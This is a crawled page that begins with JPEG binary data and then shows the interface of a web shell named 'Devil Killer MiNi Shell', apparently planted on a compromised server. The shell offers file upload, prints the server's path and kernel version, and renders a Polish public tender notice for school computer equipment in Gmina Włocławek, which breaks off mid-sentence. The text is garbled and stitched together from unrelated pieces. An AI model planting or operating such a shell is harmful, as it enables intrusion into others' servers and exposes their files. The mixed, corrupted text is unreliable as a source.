JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20230615/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20230615/0026071001-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa sprzętu komputerowego i elektronicznego wraz z oprogramowaniem w ramach przedsięwzięcia grantowego „Szkoły bez barier w Gminie Włocławek” w ramach projektu „Dostępna Szkoła” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">CENTRUM USŁUG WSPÓLNYCH GMINY WŁOCŁAWEK</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 366047995</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Orla 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Włocławek</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">87-800</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL619 - Włocławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">cuw@cuwwloclawek.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.cuwwloclawek.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa sprzętu komputerowego i elektronicznego wraz z oprogramowaniem w ramach przedsięwzięcia grantowego „Szkoły bez barier w Gminie Włocławek” w ramach projektu „Dostępna Szkoła” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-864d5fa1-0b54-11ee-b70f-ae2d9e28ec7b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00260710</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-06-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00208516/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Dostawa sprzętu komputerowego i elektronicznego wraz z oprogramowaniem w ramach przedsięwzięcia grantowego „ Szkoły bez barier w Gminie Włocławek w ramach projektu „Dostępna Szkoła”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Zamówienie jest finansowane z środków unijnych z projektu „Dostępna szkoła” w ramach IV Osi priorytetowej Programu Operacyjnego Wiedza Edukacja Rozwój „Innowacje społeczne i współpraca ponadnarodowa”, Działanie 4.1 Innowacje społeczne, konkurs nr POWR.04.01.00 IZ.00 00 021/18 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-864d5fa1-0b54-11ee-b70f-ae2d9e28ec7b <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-864d5fa1-0b54-11ee-b70f-ae2d9e28ec7b</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.1. W niniejszym postępowaniu<br/>komunikacja zamawiającego z wykonawcami odbywa się za pomocą środków komunikacji elektronicznej. Komunikacja między<br/>zamawiającym a wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje przekazywane są w formie<br/>elektronicznej za pośrednictwem www.ezamowienia.gov.pl/pl pod adresem https://ezamowienia.gov.pl/mp-client/tenders/ocds-<br/>148610-45b83e7b-f612-11ed-9355-06954b8c6cb9. Wszelką korespondencję związaną z niniejszym postępowaniem, należy<br/>przekazywać za pośrednictwem portalu. Korespondencję uważa się za przekazaną w terminie, jeżeli dotrze do zamawiającego<br/>przed upływem wymaganego terminu. Każda ze stron na żądanie drugiej niezwłocznie potwierdzi fakt otrzymania wiadomości<br/>elektronicznej.<br/>Szczegółowe wymagania techniczne i organizacyjne dot. korespondencji elektronicznej Zamawiający wskazał w Rozdziale VII SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający w Rozdziale I, pkt 16 SWZ: Ochrona danych osobowych zebranych przez<br/>zamawiającego w toku postępowania - szczegółowo wskazał obowiązek informacyjny RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający w Rozdziale I, pkt 16 SWZ: Ochrona danych osobowych zebranych przez<br/>zamawiającego w toku postępowania - szczegółowo wskazał ograniczenia stosowania RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">CUW.241.5.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia pn. Część I: „Dostawa zestawów komputerów stacjonarnych z oprogramowaniem dla Szkoły Podstawowej z Oddziałami Integracyjnymi im. Janusza Korczaka w Smólniku – 3 zestawy” jest dostawa 3 sztuk zestawów komputerów stacjonarnych z oprogramowaniem; w skład jednego zestawu komputerowego stacjonarnego z oprogramowaniem wchodzą:<br/>1) komputer stacjonarny wraz z oprogramowaniem - szt. 1;<br/>2) myszka bezprzewodowa - szt. 1;<br/>3) program aplikacji Microsoft Office Standard 2021 EDU CSP lub równoważny - szt. 1;<br/>4) klawiatura – szt. 1;<br/>5) monitor – szt. 1<br/>o parametrach i ilości szczegółowo określonej w Załączniku nr 1 do SWZ.<br/>Wykonawca, zobowiązany jest załączyć do OFERTY – Załącznik Nr 2a: „Parametry techniczne oferowanego sprzętu i<br/>oprogramowania” uzupełniony w zależności od części na którą wykonawca składa ofertę - dla wszystkich oferowanych<br/>urządzeń, sprzętu, wyposażenia, opis oferowanych produktów potwierdzający spełnianie wszystkich parametrów i wymogów<br/>określonych przez Zamawiającego - opisy parametrów, opisy funkcjonalne, oświadczenia itp., w tym w szczególności -<br/>informacje o nazwie producenta, nazwie modelu / numeru katalogowego producenta dla oferowanych urządzeń. W<br/>przypadku gdy producent nie nadaje urządzeniom powyższych nazw / numeru katalogowego dla produkowanych urządzeń,<br/>wówczas Wykonawca dołączy oświadczenie, iż producent nie nadaje urządzeniom tych nazw. Załączone opisy, dokumenty<br/>muszą umożliwić Zamawiającemu weryfikację oferowanych przez Wykonawcę rozwiązań pod względem wymaganych<br/>parametrów technicznych i funkcjonalnych. Brak złożenia zał. Nr 2a, w zależności od części na którą składana jest oferta,<br/>stanowi brak możliwości oceny oferty, a tym samym podstawę odrzucenia oferty w postępowaniu.<br/>Gwarancja udzielona przez Wykonawcę musi obejmować przeniesienie prawa własności na beneficjenta Projektu.<br/>Minimalny czas trwania gwarancji udzielonej przez Wykonawcę na sprzęt wynosi 36 miesięcy (stanowi kryterium oceny<br/>ofert).<br/>Wykonawca zobowiązany jest zrealizować przedmiot zamówienia najpóźniej w terminie maksymalnie do 21 dni<br/>kalendarzowych – stanowi kryterium oceny ofert.<br/>Zamawiający dopuszcza oferowanie urządzeń równoważnych pod warunkiem, że zagwarantują one uzyskanie<br/>parametrów technicznych i funkcjonalnych nie gorszych od podanych w Opisie przedmiotu zamówienia oraz nie obniżą<br/>określonych w dokumentacji postępowania standardów. Będą posiadały wymagane odpowiednie atesty, certyfikaty lub<br/>dopuszczenia oraz zapewnią wykonanie zamówienia zgodnie z oczekiwaniami i wymaganiami Zamawiającego określonymi<br/>w SWZ.<br/>Szczegółowy zakres i opis przedmiotu zamówienia zawiera Opis przedmiotu zamówienia, stanowiący załącznik nr 1 do<br/>SWZ. Wszystkie wymagania określone w dokumentach wskazanych powyżej stanowią wymagania minimalne, a ich<br/>spełnienie jest obligatoryjne. Niespełnienie ww. wymagań minimalnych będzie skutkować odrzuceniem oferty jako<br/>niezgodnej z warunkami zamówienia na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30213300-8 - Komputer biurkowy</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30214000-2 - Stacje robocze</p> <p class="mb-0">33195100-4 - Monitory</p> <p class="mb-0">48700000-5 - Pakiety oprogramowania użytkowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">21 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Opis kryteriów oceny ofert wraz z podaniem wag tych kryteriów i sposobu oceny ofert.<br/>1. Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im<br/>znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/>dla wszystkich części :<br/>1) Cena (C) - waga kryterium 50 % - ilość punktów 50;<br/>2) Okres rękojmi i gwarancji dla przedmiotu zamówienia - waga kryterium 20% - ilość punktów 20;<br/>3) Termin dostawy - waga kryterium 30% - ilość punktów 30;<br/>L = C + RG + T<br/>gdzie:<br/>L – całkowita liczba punktów;<br/>C – punkty uzyskane w kryterium „Cena”;<br/>RG – punkty uzyskane w kryterium „Okres rękojmi i gwarancji dla przedmiotu zamówienia”;<br/>T – punkty uzyskane w kryterium „Termin dostawy”<br/>Zasady oceny ofert w poszczególnych kryteriach:<br/>1) Cena (C) - waga 50%<br/>cena najniższa brutto*<br/>C =------------------------------------------------ x 50% - pkt 50<br/>cena oferty ocenianej brutto<br/>* spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/>a) podstawą przyznania punktów w kryterium &#34;cena&#34; będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym.<br/>b) cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia<br/>i ceny wskazane w formularzu asortymentowo- cenowym .<br/>2) Okres rękojmi i gwarancji dla przedmiotu zamówienia (RG) - waga 20% - 20 pkt:<br/>Minimalny okres rękojmi i gwarancji 36 miesięcy (lub dłuższy ale krótszy niż 48 miesięcy) - 0 pkt.<br/>Okres rękojmi i gwarancji 48 miesięcy (lub dłuższy ale krótszy niż 60 miesięcy) – 10 pkt<br/>Maksymalny okres rękojmi i gwarancji 60 miesięcy (lub dłuższy) – 20 pkt.<br/>UWAGA:<br/>Okres gwarancji i rękojmi dla przedmiotu zamówienia nie może być krótszy niż 36 miesięcy.<br/>Jeśli Wykonawca nie wpisze w ofercie żadnego okresu udzielenia rękojmi i gwarancji dla przedmiotu zamówienia, bądź też wpisze w<br/>ofercie krótszy okres niż 36 miesięcy, to jego oferta zostanie odrzucona jako niezgodna z treścią Specyfikacji Warunków<br/>Zamówienia.<br/>Zaoferowanie przez Wykonawcę okresu rękojmi i gwarancji dla przedmiotu zamówienia dłuższego niż 60 miesięcy nie wpływa na<br/>zwiększenie liczby punktów w tym kryterium, tj. do oceny Zamawiający przyjmie okres 60 miesięcy, natomiast do umowy<br/>Zamawiający wpisze okres gwarancji i rękojmi dla przedmiotu zamówienia wskazany przez Wykonawcę w Formularzu oferty.<br/>3) Termin dostawy (T) – waga 30% - 30 pkt:<br/>Maksymalny termin dostawy 21 dni kalendarzowych – 0 pkt.<br/>Termin dostawy 20 -15 dni kalendarzowych – 5 pkt.<br/>Termin dostawy 14 - 11 dni kalendarzowych – 15 pkt.<br/>Minimalny termin dostawy 10 - 1 dni kalendarzowych – 30 pkt.<br/>2. Termin dostawy dla przedmiotu zamówienia nie może być dłuższy niż 21 dni kalendarzowych i nie może być krótszy niż 1 dzień<br/>kalendarzowy.<br/>3. Jeśli Wykonawca nie wpisze w ofercie żadnego terminu dostawy dla przedmiotu zamówienia, bądź też wpisze w ofercie „0 (zero)”,<br/>bądź też wpisze w ofercie termin dostawy dłuższy niż 21 dni kalendarzowych, to jego oferta zostanie odrzucona jako niezgodna z treścią Specyfikacji Warunków Zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres rękojmi i gwarancji dla przedmiotu zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia pn. Część II: &#34;Dostawa monitora interaktywnego dla Szkoły Podstawowej z Oddziałami Integracyjnymi im. Janusza Korczaka w Smólniku&#34; jest dostawa 2 sztuk monitorów interaktywnych o parametrach i ilości szczegółowo określonej w Załączniku nr 1 do SWZ.<br/>Wykonawca, zobowiązany jest załączyć do OFERTY – Załącznik Nr 2a: „Parametry techniczne oferowanego sprzętu i oprogramowania” uzupełniony w zależności od części na którą wykonawca składa ofertę - dla wszystkich oferowanych urządzeń, sprzętu, wyposażenia, opis oferowanych produktów potwierdzający spełnianie wszystkich parametrów i wymogów<br/>określonych przez Zamawiającego - opisy parametrów, opisy funkcjonalne, oświadczenia itp., w tym w szczególności - informacje o nazwie producenta, nazwie modelu / numeru katalogowego producenta dla oferowanych urządzeń. W przypadku gdy producent nie nadaje urządzeniom powyższych nazw / numeru katalogowego dla produkowanych urządzeń,<br/>wówczas Wykonawca dołączy oświadczenie, iż producent nie nadaje urządzeniom tych nazw. Załączone opisy, dokumenty muszą umożliwić Zamawiającemu weryfikację oferowanych przez Wykonawcę rozwiązań pod względem wymaganych parametrów technicznych i funkcjonalnych. Brak złożenia zał. Nr 2a, w zależności od części na którą składana jest oferta,<br/>stanowi brak możliwości oceny oferty, a tym samym podstawę odrzucenia oferty w postępowaniu.<br/>Gwarancja udzielona przez Wykonawcę musi obejmować przeniesienie prawa własności na beneficjenta Projektu.<br/>Minimalny czas trwania gwarancji udzielonej przez Wykonawcę na sprzęt wynosi 36 miesięcy (stanowi kryterium oceny ofert).<br/>Wykonawca zobowiązany jest zrealizować przedmiot zamówienia najpóźniej w terminie maksymalnie do 21 dni kalendarzowych – stanowi kryterium oceny ofert.<br/>Zamawiający dopuszcza oferowanie urządzeń równoważnych pod warunkiem, że zagwarantują one uzyskanie parametrów technicznych i funkcjonalnych nie gorszych od podanych w Opisie przedmiotu zamówienia oraz nie obniżą określonych w dokumentacji postępowania standardów. Będą posiadały wymagane odpowiednie atesty, certyfikaty lub dopuszczenia oraz zapewnią wykonanie zamówienia zgodnie z oczekiwaniami i wymaganiami Zamawiającego określonymi w SWZ.<br/>Szczegółowy zakres i opis przedmiotu zamówienia zawiera Opis przedmiotu zamówienia, stanowiący załącznik nr 1 do SWZ. Wszystkie wymagania określone w dokumentach wskazanych powyżej stanowią wymagania minimalne, a ich spełnienie jest obligatoryjne. Niespełnienie ww. wymagań minimalnych będzie skutkować odrzuceniem oferty jako niezgodnej z warunkami zamówienia na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33195100-4 - Monitory</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">21 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Opis kryteriów oceny ofert wraz z podaniem wag tych kryteriów i sposobu oceny ofert.<br/>1. Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im<br/>znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/>dla wszystkich części :<br/>1) Cena (C) - waga kryterium 50 % - ilość punktów 50;<br/>2) Okres rękojmi i gwarancji dla przedmiotu zamówienia - waga kryterium 20% - ilość punktów 20;<br/>3) Termin dostawy - waga kryterium 30% - ilość punktów 30;<br/>L = C + RG + T<br/>gdzie:<br/>L – całkowita liczba punktów;<br/>C – punkty uzyskane w kryterium „Cena”;<br/>RG – punkty uzyskane w kryterium „Okres rękojmi i gwarancji dla przedmiotu zamówienia”;<br/>T – punkty uzyskane w kryterium „Termin dostawy”<br/>Zasady oceny ofert w poszczególnych kryteriach:<br/>1) Cena (C) - waga 50%<br/>cena najniższa brutto*<br/>C =------------------------------------------------ x 50% - pkt 50<br/>cena oferty ocenianej brutto<br/>* spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/>a) podstawą przyznania punktów w kryterium &#34;cena&#34; będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym.<br/>b) cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia<br/>i ceny wskazane w formularzu asortymentowo- cenowym .<br/>2) Okres rękojmi i gwarancji dla przedmiotu zamówienia (RG) - waga 20% - 20 pkt:<br/>Minimalny okres rękojmi i gwarancji 36 miesięcy (lub dłuższy ale krótszy niż 48 miesięcy) - 0 pkt.<br/>Okres rękojmi i gwarancji 48 miesięcy (lub dłuższy ale krótszy niż 60 miesięcy) – 10 pkt<br/>Maksymalny okres rękojmi i gwarancji 60 miesięcy (lub dłuższy) – 20 pkt.<br/>UWAGA:<br/>Okres gwarancji i rękojmi dla przedmiotu zamówienia nie może być krótszy niż 36 miesięcy.<br/>Jeśli Wykonawca nie wpisze w ofercie żadnego okresu udzielenia rękojmi i gwarancji dla przedmiotu zamówienia, bądź też wpisze w<br/>ofercie krótszy okres niż 36 miesięcy, to jego oferta zostanie odrzucona jako niezgodna z treścią Specyfikacji 